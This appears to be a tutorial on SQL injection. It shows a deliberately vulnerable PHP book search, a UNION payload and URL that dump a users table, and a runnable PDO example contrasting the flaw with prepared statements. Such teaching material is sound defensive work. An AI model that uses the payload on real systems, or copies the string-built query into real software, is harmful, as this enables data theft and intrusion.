Vulnerable Search
PHP Code:

$query = null;   // no query is built unless a search parameter was supplied

if (isset($_GET['all']) && $_GET['all'] == 1)
{
    $query = "SELECT * FROM books;";
}
else if (!empty($_GET['title']) || !empty($_GET['author']))
{
    // Request parameters are interpolated straight into the SQL text:
    // this is the injection point the page demonstrates.
    $query = sprintf("SELECT * FROM books WHERE title = '%s' OR author = '%s';",
                     $_GET['title'] ?? '',
                     $_GET['author'] ?? '');
}

if ($query != null)
{
    $result = mysqli_query($connection, $query);

    // mysqli_fetch_row() returns null once the result set is exhausted
    while (($row = mysqli_fetch_row($result)) != null)
    {
        printf("<tr><td>%s</td><td>%s</td><td>%s</td></tr>", $row[0], $row[1], $row[2]);
    }
}
            

Vulnerability:

The title and author parameters are placed into the SQL string with sprintf and are never parameterised or escaped, so a single quote in either value ends the string literal and the rest of the input is parsed as SQL.
Pass ' UNION SELECT * FROM users WHERE '1'='1 as author to get all users' data: the UNION appends every row of the users table to the book results, and the page prints it as table rows.
The same result is obtained by using the URL books1.php?author='+UNION+SELECT+*+FROM+users+WHERE '1'='1.
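The following is an added example, not the page's own code, showing the same search written two ways side by side: the string-building version from the page and a version using a prepared statement with bound parameters. It runs stand-alone against an in-memory SQLite database through PDO instead of the page's mysqli connection; the table layouts and sample rows are constructed for the demo, and the helper names searchVulnerable and searchSafe are assumptions. The point it shows is that once input is bound as a value, a quote in it can no longer change the statement's structure, so the page's UNION input is compared literally against the author column and matches nothing.

```php
<?php
// Added example, not from the original page: vulnerable vs. parameterised search.
// Uses PDO + in-memory SQLite so it runs offline; schema and rows are constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE books (id INTEGER, title TEXT, author TEXT)");
$db->exec("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)");
$db->exec("INSERT INTO books VALUES (1, 'Dune', 'Herbert'), (2, 'Neuromancer', 'Gibson')");
$db->exec("INSERT INTO users VALUES (1, 'alice', 'hash-placeholder')");

// Vulnerable form (mirrors the page): input is interpolated into the SQL text,
// so a quote in $author closes the literal and the remainder is parsed as SQL.
function searchVulnerable(PDO $db, string $title, string $author): array
{
    $query = sprintf("SELECT * FROM books WHERE title = '%s' OR author = '%s';",
                     $title, $author);
    return $db->query($query)->fetchAll(PDO::FETCH_NUM);
}

// Hardened form: named placeholders are bound as values, so the input is
// always data. The column list is explicit so a row can never carry more
// columns than the HTML table expects.
function searchSafe(PDO $db, string $title, string $author): array
{
    $stmt = $db->prepare(
        "SELECT id, title, author FROM books WHERE title = :title OR author = :author"
    );
    $stmt->execute([':title' => $title, ':author' => $author]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// The author value from the page's "Vulnerability" section.
$payload = "' UNION SELECT * FROM users WHERE '1'='1";

// Vulnerable: no book has an empty title/author, but the UNION adds the users row.
$rows = searchVulnerable($db, '', $payload);
printf("vulnerable: %d row(s) returned\n", count($rows));

// Hardened: the payload is compared literally against author, so no row matches.
$rows = searchSafe($db, '', $payload);
printf("safe: %d row(s) returned\n", count($rows));

// A normal search still works through the prepared statement.
$rows = searchSafe($db, '', 'Gibson');
printf("normal search: %s\n", $rows[0][1]);
```

Run with `php example.php` (PDO SQLite support is required). With mysqli the equivalent is mysqli_prepare() followed by mysqli_stmt_bind_param() and mysqli_stmt_execute(); escaping with mysqli_real_escape_string() is a weaker fallback because it depends on the connection character set and is easy to forget on one of several parameters.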